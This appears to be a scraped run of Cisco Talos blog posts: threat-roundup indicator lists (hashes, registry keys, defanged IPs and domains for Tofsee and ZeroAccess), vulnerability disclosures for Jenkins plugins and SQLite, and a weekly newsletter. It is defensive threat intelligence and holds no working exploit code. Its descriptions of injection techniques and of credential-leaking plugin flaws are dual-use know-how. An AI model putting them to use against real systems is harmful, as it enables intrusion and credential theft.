%APPDATA%\Microsoft\Xabzsenoa\xabzseno.exe1
See JSON for more IOCs
File Hashes
  • 003c194a95c7849375590c48f1c5bc5fa23099976e09c997f29b22b367c1d3d2
  • 005055ca28d6866f033aff3753a1ef7c4064b5e094eaa663953407a9b19c6a71
  • 02b5f67a3eba31421dc595a7efed8e04834e9f0121c8bcd0186e99dba9781171
  • 087ddce345ea3ed2fed8d02dd466026c0fc0fa5aa7749b392683311fd97a80e2
  • 0e390dd0547334471c08c3b8b4e7ec3ad1d8fe4facabdb5df674af76c8e149d0
  • 10435b4efc8049d260d4b36673f7d656b9fa7163d00840acd0860175e2a79f47
  • 14a95d66f90495fcc278258097ed704aca265dd6bbb966903abe00dd7225cd11
  • 1dd13f0648a70754c883c6262c3633c19aeffa4e3558f0f16da78fc796a76cf1
  • 385f6390936d000f4d9db3e30b117ac382f70f4b7d1f3f4af06808e26683bf3d
  • 3afec20c013fca0abef646a7a6f0f5cdd3826541587cfd93c25033a35e588cb2
  • 3dede5abeacdabc758f70beef2984ac184bbec3112be97e891bb64abb2981373
  • 3f61be1a4bcb773c48a6dc7ed489838796a6b512bc14a517a667fb28a2a8e3ee
  • 401b399a3aa67d42306ce7291299b7f25a24345a980a7bd719c96a6834b9bf48
  • 52c90c5917cb1c6955f68c5b03e448b976ec3f1c258eb6039c5da399b2fd41db
  • 581d9e271871b1948191755bc99e2e9ec5346408f39613aec5c3b1e52d0449bd
  • 649e6217744762016fadb2f7f36a654c607ad160d136714946aa6e0478dc7a87
  • 673e3e8e62b09e39c161091ee70f046c038ba6f24f2a1da135af23bcc1701c20
  • 69c3c4ee664fc814ef070ae902ebaa305eda6ffd23a10e5b97afe49c1300ebff
  • 69d9d27ab1c802cd322c1b7795bda4de65cc7447982076f1e2d6873a8423d57f
  • 6aad36b27c188e73090f3b79352750489a1dce20f5396e63b2af3e998eba0f0a
  • 6e01014528a359c81851b2197a4656e13d87b15424dc961cc6d770e4d4c747ee
  • 76097734f64ce5ae9b008273431fa4c81e32b05a9b8586c39b80e68ee70d0a8a
  • 88cb1af973183aa93bf10d74440333b622206be6d0bd77322c6f8689f2cf24ec
  • 897b0a510174cbc4757982703e42a0c14c4bdba0e6bf77db5a6f94a3c2651f3a
  • 8ae8d944960e54c7a833875f71bdae6243e7fa380ae3fd8176b07cb7d7819508
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Exprev

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
  • Kovter injection detected (4469)
    A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
  • Madshi injection detected (3542)
    Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
  • PowerShell file-less infection detected (2488)
    A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
  • Process hollowing detected (541)
    Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
  • Gamarue malware detected (240)
    Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
  • Dealply adware detected (221)
    DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
  • Suspicious PowerShell execution detected (156)
    A PowerShell command has attempted to bypass execution policy to run unsigned or untrusted script content. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
  • Installcore adware detected (65)
    Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
  • Atom Bombing code injection technique detected (65)
    A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shell code as a global Atom, then accessing it through an Asynchronous Process Call (APC). A target process runs the APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
  • Excessively long PowerShell command detected (57)
    A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

Vulnerability Spotlight: Multiple bugs in several Jenkins plugins

$
0
0


Peter Adkins of Cisco Umbrella discovered these vulnerabilities.

Executive summary

Jenkins is an open-source automation server written in Java. There are several plugins that exist to integrate Jenkins with other pieces of software, such as GitLab. Today, Cisco Talos is disclosing vulnerabilities in three of these plugins: Swarm, Ansible and GitLab. All three of these are information disclosure vulnerabilities that could allow an attacker to trick the plugin into disclosing credentials from the Jenkins credential database to a server that they control.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Jenkins and the associated companies to ensure that these issues are resolved and that updates are available for affected customers.

Vulnerability details

Jenkins Swarm Plugin XML external entities information disclosure vulnerability  (TALOS-2018-0783/CVE-2019-5022)

The Jenkins Self-Organizing Swarm Modules Plugin, version 3.14, contains a trivial XXE (XML External Entities) vulnerability inside of the `getCandidateFromDatagramResponses()` method. As a result of this issue, it is possible for an attacker on the same network as a Swarm client to read arbitrary files from the system by responding to the UDP discovery requests with a specially crafted response.

Read the complete vulnerability advisory here for additional information.

Jenkins Ansible Tower Plugin information disclosure vulnerability (TALOS-2018-0786/CVE-2019-5025)

An exploitable information disclosure vulnerability exists in the `testTowerConnection` function of the Jenkins Ansible Tower Plugin 0.9.1. A specially crafted HTTP request from a user with Overall/Read permissions - such as an anonymous user, if enabled - can cause affected versions of this plugin to disclose credentials from the Jenkins credentials database to an attacker-controlled server. As this vulnerability is exploitable through HTTP GET request, this vulnerability may also be exploited via Cross-Site Request Forgery (CSRF). In addition to the above, if the responding server does not return properly formatted JSON document, the response will be reflected to the user as part of the reported error resulting in an HTTP GET only Server Side Request Forgery (SSRF).

This vulnerability is also present in the `fillTowerCredentialsIdItems` endpoint exposed by this plugin, which allows for the enumeration of credentials identifiers required for this attack to be successful.

Read the complete vulnerability advisory here for additional information.

Jenkins GitLab plugin information disclosure vulnerability (TALOS-2018-0788/CVE-2019-5027)

An exploitable information disclosure vulnerability exists in the `testConnection` function of the Jenkins GitLab Plugin 1.5.11. A specially crafted HTTP request from a user with Overall/Read permissions - such as an anonymous user, if enabled - can cause affected versions of this plugin to disclose credentials from the Jenkins credentials database to an attacker-controlled server. As this vulnerability is exploitable through HTTP GET request, this vulnerability may also be exploited via Cross-Site Request Forgery (CSRF).

In order for this attack to be successful, the attacker will need to know the credential ID of the credentials to disclose. This can be found through a number of ways, such as exposed build logs (read), access to the credential manager in the Jenkins UI (read), or through another vulnerable plugin which provides a `fillCredentialsIdItems` style endpoint.

Read the complete vulnerability advisory here for additional information.

Versions tested

Jenkins Ansible Tower Plugin, version 0.9.1, is affected by CVE-2019-5025. Jenkins Artifactory Plugin, versions 3.2.1 and 3.2.0 are affected by CVE-2019-5026. Jenkins GitLab Plugin, version 1.5.11, is affected by CVE-5027. Swarm-Client, version 3.14, is affected by CVE-2019-5022.



Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 49362, 49363, 49370 and 49373

Vulnerability Spotlight: Remote code execution bug in SQLite

$
0
0

Cory Duplantis of Cisco Talos discovered this vulnerability.

Executive summary

SQLite contains an exploitable use-after-free vulnerability that could allow an attacker to gain the ability to remotely execute code on the victim machine. SQLite is a client-sidedatabase management system contained in a C programming library. SQLite implements the Window Functions feature of SQL, which allows queries over a subset, or “window,” of rows. This specific vulnerability lies in that “window” function.

In accordance with our coordinated disclosure policy, Cisco Talos worked with SQLite to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

SQLite3 window function remote code execution vulnerability (TALOS-2018-0777/CVE-2019-5018)

An exploitable use-after-free vulnerability exists in the window function of SQLite3 3.26.0. A specially crafted SQL command can cause a use-after-free vulnerability, potentially resulting in remote code execution. An attacker can send a malicious SQL command to trigger this vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that versions 3.26.0 and 3.27.0 of SQLite are affected by this vulnerability.



Threat Source newsletter (May 9)

$
0
0

Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

If you haven’t yet, there’s still time to register for this year’s Talos Threat Research Summit — our second annual conference by defenders, for defenders. This year’s Summit will take place on June 9 in San Diego — the same day Cisco Live kicks off in the same city. We sold out last year, so hurry to register!

This was a heavy week for vulnerability discovery. Snort rules are loaded up with protections against a recent wave of attacks centered around a critical Oracle WebLogic bug. We also discovered vulnerabilities in SQLite and three different Jenkins plugins.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Location: Industriens Hus, Copenhagen, Denmark
Date: May 29
Speaker: Paul Rascagnères
Synopsis: Paul will give an overview of an espionage campaign targeting the Middle East that we called “DNSpionage.” First, he will go over the malware and its targets and then talk about the process the attackers took to direct DNSs. The talk will include a timeline of all events in this attack, including an alert from the U.S. Department of Homeland Security.

Location: ILEC Conference Centre, London, England
Date: June 5
Speaker: Paul Rascagnères
Synopsis: Privacy has become a more public issue over time with the advent of instant messaging and social media. Secure Instant Messaging (SIM) has even become a problem for governments to start worrying about. While many people are using these messaging apps, it’s opened up the door for attackers to create phony, malicious apps that claim to offer the same services. In this talk, Paul will show various examples of these cloned applications and the different techniques used to send data back to the attacker. 

Cyber Security Week in Review

  • The city of Baltimore’s online government operations were completely stalled this week after a ransomware attack. The city’s IT director said the RobinHood malware forced the government to go “manual” with many tasks. Emergency services have not been impacted.
  • A group of hackers stole information from three American antivirus companies. The group is offering source code and network access to the companies for $300,000. The companies affected have not been named yet but were recently contacted by the federal government to alert them of the breach.
  • Attackers stole $41 million worth of Bitcoin from cryptocurrency exchange Binance. A representative from Binance said hackers used a variety of techniques, “including phishing, viruses and other attacks.”
  • The tax services of Danish mega company Wolters Kluwer were taken offline this week as the result of a cyber attack. The outage specifically affected CCH, a cloud-based company, that caused “network and service interruptions.”
  • WordPress’ latest update includes a few long-awaited security updates. Each of the content management system’s updates will now include digital signatures, and there is a new “Site Health” page for users.
  • Google’s latest security update fixed a number of vulnerabilities in the Android operating system, including several critical- and high-severity bugs. The most notable fix is for a vulnerability in Media framework that could “enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.”
  • Cisco released security updates for a critical vulnerability in the Elastic Services Controller. An unauthenticated, remote attacker could exploit this flaw to obtain admin privileges. 
  • Israel bombed the cyber headquarters of Hamas in retaliation for an alleged cyber attack. Military involvement, in this case, has brought up several questions surrounding how cyber warfare could begin intersecting with physical retaliation.
  • A power supplier on the West Coast was hit with a cyberattack last week. The attack did not cause any loss of power for customers but did prevent visibility in some parts of the country. 
  • Cyber firms are increasingly turning to non-traditional sources of recruiting as the industry looks to fill a talent gap. Some companies are training researchers on the go, even if they do not have a traditional security degree.

Notable recent security issues

Title: Attacks using WebLogic bugs expand, evolve
Description: Attackers continue to spread malware by exploiting a critical vulnerability in Oracle WebLogic. The bug, identified as CVE-2019-2725, was disclosed and patched last week. However, as users have been slow to update, attackers are still able to exploit this vulnerability to deliver ransomware, specifically Gandcrab and XMRig.
Snort SIDs: 50014 - 50025

Title: Cisco discloses 41 bugs, one of them critical
Description: Cisco released a security update for several of its products, including one critical bug in the SSH key management for the Nexus 9000 series Application Centric Infrastructure (ACI) mode switch software. An attacker could exploit this vulnerability by connecting to a machine via SSH, which could allow them to connect to the system with the same privileges as a root user.
Snort SIDs: 49992 - 49996, 50006, 50007

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 799b30f47060ca05d80ece53866e01cc.vir
Claimed Product: N/A
Detection Name: W32.Generic:Gen.21ij.1201

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: 9d48f382ec11bd9b35488a2c2b878e5401c2be43f00bcbae30d1619e6e2bf0c1
MD5: dd46d0260a6cdf5625d468398bae1f60
Typical Filename: N/A
Claimed Product: N/A
Detection Name: Win.Dropper.Undefined::tpd

Threat Roundup for May 3 to May 10

$
0
0

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 03 and May 10. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Trojan.Tofsee-6965613-0
    Trojan
    Tofsee is multi-purpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
     
  • Win.Trojan.Zeroaccess-6965107-0
    Trojan
    ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine and serves as a platform for conducting click fraud campaigns.
     
  • Win.Dropper.Emotet-6964837-0
    Dropper
    Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
     
  • Win.Trojan.Darkkomet-6964750-0
    Trojan
    DarkKomet is a freeware remote access trojan that was released by an independent software developer. It provides the same functionality you would expect from a remote access tool: keylogging, webcam access, microphone access, remote desktop, URL download, program execution, etc.
     
  • Win.Malware.Kryptik-6964485-1
    Malware
    Kryptik is oftentimes a generic detection name for a Windows trojan. Some of the malicious activities that could be performed by these samples, without the user's knowledge, include collecting system information, downloading/uploading files and dropping additional samples.
     
  • Win.Packed.Kovter-6964099-0
    Packed
    Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
     
  • Win.Malware.Python-6964012-0
    Malware
    Win.Malware.Python is a generic name given to malware written in Python and, typically, compiled into a Windows executable using tools like PyInstaller. There are a vast array of supporting libraries, proof-of-concept exploit tools, and example code that makes developing malware in Python easier than with lower-level languages. Examples of functionality commonly seen in this type of malware include the ability to spread laterally by exploiting EternalBlue PoC scripts and file encryption performed by ransomware.
     
  • Win.Ransomware.Cerber-6963958-0
    Ransomware
    Cerber is ransomware that encrypts documents, photos, databases and other important files using the file extension ".cerber."
     
  • Doc.Downloader.Powload-6959926-0
    Downloader
    Powload is a malicious document that uses PowerShell to download malware. This campaign is currently distributing Emotet malware.
     
  • Win.Dropper.Qakbot-6962757-0
    Dropper
    Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
     

Threats

Win.Trojan.Tofsee-6965613-0


Indicators of Compromise


Registry KeysOccurrences
<HKU>\.DEFAULT\Control Panel\Buses 24
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config3
24
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\fymsrzfu 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: Type
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: Start
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: ErrorControl
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: DisplayName
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: WOW64
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: ObjectName
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FYMSRZFU
Value Name: Description
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TMAGFNTI
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TMAGFNTI
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TMAGFNTI
Value Name: Description
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\jcqwvdjy
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\zsgmltzo 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: Type
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: ErrorControl
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: DisplayName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: WOW64
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: ObjectName
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: Description
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\jcqwvdjy 2
MutexesOccurrences
\BaseNamedObjects\ServiceEntryPointThread1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
239[.]255[.]255[.]25024
69[.]55[.]5[.]25024
46[.]4[.]52[.]10924
96[.]114[.]157[.]8024
176[.]111[.]49[.]4324
85[.]25[.]119[.]2524
144[.]76[.]199[.]224
144[.]76[.]199[.]4324
212[.]227[.]15[.]924
43[.]231[.]4[.]724
74[.]208[.]5[.]2024
192[.]0[.]47[.]5924
207[.]69[.]189[.]22924
94[.]23[.]27[.]3824
64[.]136[.]44[.]3723
172[.]217[.]10[.]22823
47[.]43[.]18[.]923
64[.]98[.]36[.]422
212[.]54[.]56[.]1122
65[.]20[.]0[.]4920
208[.]89[.]132[.]2719
117[.]53[.]114[.]1515
74[.]208[.]5[.]415
125[.]209[.]238[.]10015
213[.]33[.]98[.]14914
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net24
mx00[.]emig[.]gmx[.]net24
mx1[.]comcast[.]net24
whois[.]iana[.]org24
250[.]5[.]55[.]69[.]bl[.]spamcop[.]net24
verizon[.]net24
comcast[.]net24
whois[.]arin[.]net24
mx-aol[.]mail[.]gm0[.]yahoodns[.]net24
250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org24
hotmail-com[.]olc[.]protection[.]outlook[.]com24
cxr[.]mx[.]a[.]cloudfilter[.]net24
microsoft-com[.]mail[.]protection[.]outlook[.]com24
cox[.]net24
mx00[.]mail[.]com24
earthlink[.]net24
mx[.]optimum[.]net24
optonline[.]net24
mx1[.]mail[.]icloud[.]com24
mx6[.]earthlink[.]net24
victoria1999[.]hotrusgirls[.]cn24
irina1993[.]hotlovers[.]cn24
hot-beauty[.]cn24
hotladies[.]cn24
mx[.]dca[.]untd[.]com23
See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile:.repos24
%SystemRoot%\SysWOW64\config\systemprofile24
%SystemRoot%\SysWOW64\IPHLPAPI.DLL10
%SystemRoot%\SysWOW64\fymsrzfu3
%SystemRoot%\SysWOW64\winnsi.dll2
%SystemRoot%\SysWOW64\kdrxwekz2
%SystemRoot%\SysWOW64\nguazhnc2
%SystemRoot%\SysWOW64\tmagfnti2
%SystemRoot%\SysWOW64\zsgmltzo2
%SystemRoot%\SysWOW64\jcqwvdjy2
%SystemRoot%\SysWOW64\xqekjrxm2
%TEMP%\chuuxwmr.exe2
%TEMP%\tpjpvxpg.exe2
%System32%\mzfgsdih\tpjpvxpg.exe (copy)2
%TEMP%\nnmsdryb.exe1
%TEMP%\vqxutqmn.exe1
%TEMP%\nmyuzjtg.exe1
%TEMP%\dtzstbra.exe1
%TEMP%\tvqhyszs.exe1
%TEMP%\gidulfmf.exe1
%TEMP%\qtbbzxbk.exe1
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\04fa61ce-e4d7-48c8-9def-427199d4e0041
%TEMP%\vyggecgp.exe1
%TEMP%\hcjgfcyz.exe1
%TEMP%\omtpoxvm.exe1
See JSON for more IOCs
File Hashes
  • 0647fc954ed93c7ea544d83e63a40d502f5fffd8a13f30017a73b67e9a45f1b2
  • 06cd974d945d25823b35d71c42c63223e70e3117e457e93dee236b32767bd7ec
  • 0780495fcad283f3b4d0a8c67ab1f899901a411609e5d418c32d63ea341ab025
  • 10d8ca95e213491b05ec904bb8632212e22886d66c45525c104678dc80f670ae
  • 125c11dec65eb1649338f5ed9442a65f79a0bcfd386e7db297de44ac7674c0b6
  • 243c7f05dc3569c907f03ed8a84d215ff9aa72c83cf3a2204d60e82c66d9aaff
  • 2db74b28c8d6fb6cd5dc708a4f63b5f0552edfdef708c2f86ea3a40361e963fd
  • 3a9fc763818d743f0b87fffc92d2fd29f6e76f182142a43a6b65c9d12dd3efd4
  • 3f057b371908761ce99846fe561f0c86376ee18ad0124fd8e848d7f2862e8c05
  • 43726985501f447b624194119724d9bf9673a6ec4a9b4d4367d8157569f5dc7f
  • 456d4a6d6fbdc25b6c9cafde2af81b6023293e564ddd6473e42f8e420f1fcdd5
  • 4623e1ce31a8671e59640e83fc545a5f19e167c31cfc6e8d097864c7a4c27859
  • 539975f3e33f6b41f3038ed1101633ce5635004bce96ca7764c19a79fb4f83ca
  • 5a0f61ab9e096aa16c514f37f60853a708b3eed62dfe8c14643dcc2652141d96
  • 61baf3c68654787eab765e7361c07270cac1b7041a07062dff7485aa860fc4b5
  • 63f7598a21986a406d2a1ac946184140a80558bc7598bebabfcff82214895d75
  • 658a040596a2b67e36bd8af81037fefd039eae1bcf63b99928f3b5125e414019
  • 751ac2eb414eba0c3f93245c865f2162e328c461c5c844271ffb299df5d1e4df
  • 79c2cfd759cc6d1727c7f7015e40333900bda4571e91d18899b98025c0480b94
  • 7f5b069015e694544a2a693ddc7815c82c9ac6ec0d523ae9ed06d77b78965be4
  • 82fbb918e0d47f7d9992cd3c5479ee1468d608d1e176f7570994e99ffc66e6b0
  • 858f2612c45ad1bb0b986f74274f61224b827912f4e1a80f9121cad40edabacf
  • 8ac67c280615873b5aec89d5bd5838d2a23552e7c47511a99b64799d28d659ff
  • 8ad48911e8594b3530022ae45fbe12e40438c71cca38d2a7e85a8d3efd220180
  • 93cb0db5f5aecff9574b756b557280b61d557724591817013c016a3a68096be5
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella


Win.Trojan.Zeroaccess-6965107-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: DeleteFlag
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
17
<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch 17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: DeleteFlag
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: DeleteFlag
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: DeleteFlag
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\Epoch 17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER
Value Name: Start
17
<HKCU>\Software\Classes\clsid 17
<HKCR>\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9} 17
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 17
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32
Value Name: ThreadingModel
17
<HKCR>\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\INPROCSERVER32 17
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
17
<HKLM>\SOFTWARE\CLASSES\CLSID\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\INPROCSERVER32 17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: ErrorControl
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS
Value Name: ErrorControl
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC
Value Name: ErrorControl
17
MutexesOccurrences
N/A-
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
64[.]210[.]151[.]3217
77[.]52[.]81[.]24317
72[.]47[.]100[.]3817
89[.]228[.]63[.]3717
65[.]30[.]151[.]3617
98[.]247[.]217[.]24417
173[.]217[.]71[.]24617
101[.]63[.]15[.]3517
209[.]195[.]111[.]24617
87[.]218[.]204[.]3317
115[.]240[.]123[.]3217
114[.]75[.]62[.]3217
96[.]26[.]208[.]3017
70[.]64[.]83[.]3017
82[.]22[.]40[.]3017
75[.]224[.]240[.]2917
84[.]228[.]113[.]2617
119[.]149[.]38[.]2517
212[.]72[.]112[.]2417
46[.]194[.]56[.]2417
84[.]231[.]16[.]2317
72[.]192[.]54[.]2117
117[.]217[.]106[.]24717
91[.]67[.]192[.]1917
77[.]11[.]149[.]1917
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
promos[.]fling[.]com17
Files and or directories createdOccurrences
@17
L17
U17
\$Recycle.Bin\S-1-5-1817
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f17
n17
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@17
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@17
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n17
%System32%\LogFiles\Scm\e22a8667-f75b-4ba9-ba46-067ed4429de817
\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\@15
\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\n15
\RECYCLER\S-1-5-21-1258710499-2222286471-4214075941-500\$ad714f5b8798518b3ccb73fd900fd2ba\@15
